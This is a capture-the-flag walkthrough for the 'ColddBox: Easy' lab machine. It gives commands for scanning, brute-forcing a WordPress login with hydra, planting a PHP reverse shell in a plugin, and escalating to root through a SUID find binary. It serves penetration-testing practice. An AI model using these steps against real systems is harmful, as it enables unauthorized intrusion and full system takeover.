ColddBox: Easy

Reconnaissance

Initial nmap scan to find open ports, using the flag "treat all hosts as alive" (-Pn):

nmap -Pn 10.10.70.76

Detailed Nmap scan:

Command Breakdown:

  • (-sV): Service version detection

  • (-sC): Default nmap scripts

  • (-p 80): Scan only port 80

  • (-oN nmap): Save the output to a file called nmap

nmap -sV -sC -p 80 -oN nmap 10.10.70.76

Enumeration

Let's visit the site.

It looks like a well-made page. While looking through the website I found a login page.

Also, looking at the nmap scan we know that WordPress 4.1.31 is running. There is a WordPress scanner called wpscan; let's use it to find more information.

wpscan --url http://10.10.70.76/ -e vp,t,u

Looking at the output, we find some interesting information.

Let's use hydra to brute-force at least one password for one of the users. I saved the usernames in a file called users.

Exploitation

Let's now use hydra to crack the password:

hydra -L users -P /usr/share/wordlists/rockyou.txt 10.10.70.76 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

And we get the password. Let's log in.

We are logged in. To get a reverse shell on the machine we have to add a reverse shell that you can find here. First, go to the Plugins tab and replace one of the plugins with the PHP reverse shell; make sure to change the IP to yours.

After changing it, click Update File and start a netcat listener.

Then navigate to the page:

http://10.10.58.100/wp-content/plugins/akismet/akismet.php

You should get a reverse shell. Let's stabilize the shell.

Privilege Escalation

Let's look for SUID binaries that we can exploit:

find / -perm -u=s -type f 2>/dev/null

We have /usr/bin/find; let's go to GTFOBins and find the command to escalate privileges.

Let's use the second command:

find . -exec /bin/sh -p \; -quit

We are now root.
